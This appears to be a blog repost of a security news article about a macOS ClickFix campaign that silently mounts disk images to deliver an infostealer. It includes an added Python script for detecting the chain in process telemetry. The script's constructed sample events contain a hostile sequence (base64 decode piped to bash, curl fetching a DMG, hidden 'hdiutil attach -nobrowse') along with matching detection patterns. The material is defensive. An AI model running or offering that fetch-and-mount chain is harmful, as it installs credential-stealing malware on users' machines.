https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer

A newly identified campaign targeting macOS users adapts the increasingly prevalent ClickFix social engineering technique to Apple’s desktop operating system: it mounts a disk image silently in the background to deliver information-stealing malware, without provoking the suspicion that more overt installation methods typically do. ClickFix, which emerged and proliferated as a Windows-focused vector, instructs victims to copy and paste commands into their own systems under the pretence of fixing a technical problem, proving they are human, or completing a routine software update. Because the victim runs the command themselves, the attack sidesteps controls that would block an unsolicited installation. The port to macOS challenges the widely held but increasingly outdated belief among Apple users that their platform is inherently protected from the social engineering that routinely compromises Windows environments, and it reflects a broader shift among threat actors towards purpose-built campaigns against the growing macOS user base rather than treating it as an afterthought.

The macOS variant adds a technically noteworthy twist: the disk image (DMG) is mounted silently as part of the infection chain. macOS ships command-line tooling for attaching disk images, and a mount performed that way need not produce the Finder window or desktop volume icon that a cautious user would otherwise notice and question. Disk images are a familiar and trusted format for macOS users, routinely used for legitimate software distribution by Apple and third-party developers alike, so their appearance in an attack chain carries a plausibility that more obviously suspicious file types lack. By combining a trusted file format with the psychological manipulation at the heart of ClickFix, the attackers have built an infection path that is hard for victims to recognise as malicious at the moment they are most exposed: while actively following what they believe are legitimate instructions to fix a problem or complete a task.
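Detection logic for the chain described above, as an added example that is not part of the original article and not the campaign's own code: it correlates a command pasted into a Terminal session that fetches or decodes content with a disk image attached silently shortly afterwards, which is the pattern the two paragraphs above describe. The process-telemetry schema (JSON lines with ts, pid, ppid, name, parent, cmd) and the sample events are constructed for the example, and the use of hdiutil with its -nobrowse option for the silent mount is an assumption on my part; the article names no command.

```python
#!/usr/bin/env python3
"""Spot a macOS ClickFix-style chain in process-execution telemetry.

Added example, not code from the article. The JSON-lines event format and
its field names are a constructed, simplified schema, not any vendor's.
Assumption: the silent mount uses hdiutil's -nobrowse option, the documented
way to attach a DMG without it appearing in Finder or on the desktop.
"""
import json
import shlex
from datetime import datetime, timedelta

SHELLS = {"sh", "bash", "zsh"}
TERMINALS = {"Terminal", "iTerm2"}         # parent apps that mark an interactive session
FETCHERS = {"curl", "wget"}
DECODE_FLAGS = {"-d", "-D", "--decode"}    # macOS base64 accepts -D (and -d on recent releases)
WINDOW = timedelta(minutes=5)              # fetch/decode must precede the mount by at most this


def parse_events(text: str) -> list:
    """Parse constructed JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def argv_of(cmd: str) -> list:
    try:
        return shlex.split(cmd)
    except ValueError:                     # unbalanced quotes: fall back to a naive split
        return cmd.split()


def is_silent_mount(cmd: str) -> bool:
    """hdiutil attach/mount with -nobrowse: the volume is attached but hidden from Finder."""
    argv = argv_of(cmd)
    return (len(argv) >= 3 and argv[0].rsplit("/", 1)[-1] == "hdiutil"
            and argv[1] in {"attach", "mount"} and "-nobrowse" in argv[2:])


def is_remote_fetch_or_decode(cmd: str) -> bool:
    """curl/wget, or base64 decoding: how a pasted one-liner typically obtains its next stage."""
    argv = argv_of(cmd)
    if not argv:
        return False
    name = argv[0].rsplit("/", 1)[-1]
    return name in FETCHERS or (name == "base64" and any(a in DECODE_FLAGS for a in argv[1:]))


def session_of(event: dict, by_pid: dict):
    """Walk the parent chain up to the shell a terminal app spawned; return its pid, or None."""
    cur, seen = event, set()
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if cur["name"] in SHELLS and cur["parent"] in TERMINALS:
            return cur["pid"]
        cur = by_pid.get(cur["ppid"])
    return None


def detect(events: list) -> list:
    """Alert on a silent mount preceded, within WINDOW, by a fetch/decode in the same session."""
    by_pid = {e["pid"]: e for e in events}
    by_session = {}                        # session pid -> [(event, "fetch" | "mount"), ...]
    for e in sorted(events, key=lambda e: e["ts"]):
        sid = session_of(e, by_pid)
        if sid is None:
            continue                       # not under an interactive terminal shell: out of scope
        if is_remote_fetch_or_decode(e["cmd"]):
            by_session.setdefault(sid, []).append((e, "fetch"))
        elif is_silent_mount(e["cmd"]):
            by_session.setdefault(sid, []).append((e, "mount"))
    alerts = []
    for sid, items in by_session.items():
        for e, kind in items:
            if kind != "mount":
                continue
            t = datetime.fromisoformat(e["ts"])
            prior = [f["cmd"] for f, k in items if k == "fetch"
                     and timedelta(0) <= t - datetime.fromisoformat(f["ts"]) <= WINDOW]
            if prior:
                alerts.append({"session_pid": sid, "mount_cmd": e["cmd"], "fetch_cmds": prior})
    return alerts


# Constructed sample: one ClickFix-style session (pids 500-504), one ordinary developer
# session (600-602) and an unrelated background mount (700). Not real telemetry.
SAMPLE_EVENTS = """
{"ts": "2025-01-01T10:00:00", "pid": 500, "ppid": 400, "name": "zsh", "parent": "Terminal", "cmd": "-zsh"}
{"ts": "2025-01-01T10:00:10", "pid": 501, "ppid": 500, "name": "base64", "parent": "zsh", "cmd": "base64 -d"}
{"ts": "2025-01-01T10:00:10", "pid": 502, "ppid": 500, "name": "bash", "parent": "zsh", "cmd": "bash"}
{"ts": "2025-01-01T10:00:12", "pid": 503, "ppid": 502, "name": "curl", "parent": "bash", "cmd": "curl -fsSL https://example.invalid/update.dmg -o /tmp/update.dmg"}
{"ts": "2025-01-01T10:00:15", "pid": 504, "ppid": 502, "name": "hdiutil", "parent": "bash", "cmd": "hdiutil attach -nobrowse -quiet /tmp/update.dmg"}
{"ts": "2025-01-01T11:00:00", "pid": 600, "ppid": 400, "name": "zsh", "parent": "Terminal", "cmd": "-zsh"}
{"ts": "2025-01-01T11:00:05", "pid": 601, "ppid": 600, "name": "hdiutil", "parent": "zsh", "cmd": "hdiutil attach /Users/dev/Downloads/Editor-1.2.dmg"}
{"ts": "2025-01-01T11:30:00", "pid": 602, "ppid": 600, "name": "curl", "parent": "zsh", "cmd": "curl -sI https://example.invalid/"}
{"ts": "2025-01-01T11:30:02", "pid": 700, "ppid": 1, "name": "hdiutil", "parent": "launchd", "cmd": "hdiutil attach -nobrowse /Library/Caches/installer.dmg"}
"""

if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert, indent=2))
```

Two caveats. Developers legitimately curl and mount images from a terminal, so neither indicator alone is worth an alert; the correlation (a fetch or decode, then a hidden mount, in one interactive session minutes apart) is what keeps the rule useful, and WINDOW and TERMINALS need tuning to your fleet. On the endpoint itself, `hdiutil info` lists every attached image, including ones mounted with -nobrowse, which is a quick check when a user reports having pasted something into Terminal.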

The payload is an infostealer, a class of malware built to harvest credentials, browser cookies, saved passwords, cryptocurrency wallet data, and other sensitive information from the compromised machine and to transmit it silently to attacker-controlled infrastructure. Infostealers have become one of the most commercially significant malware categories in the current threat landscape: stolen credential data is routinely sold through criminal marketplaces and used to enable follow-on intrusions into corporate networks, cloud environments, and financial accounts. macOS users should treat any web page or pop-up that instructs them to open Terminal, run a command, or manually execute a file with extreme scepticism, however legitimate the surrounding context appears, and should keep their systems on current macOS security updates with reputable endpoint protection capable of detecting infostealer behaviour.

Discover more from Edwin Kwan
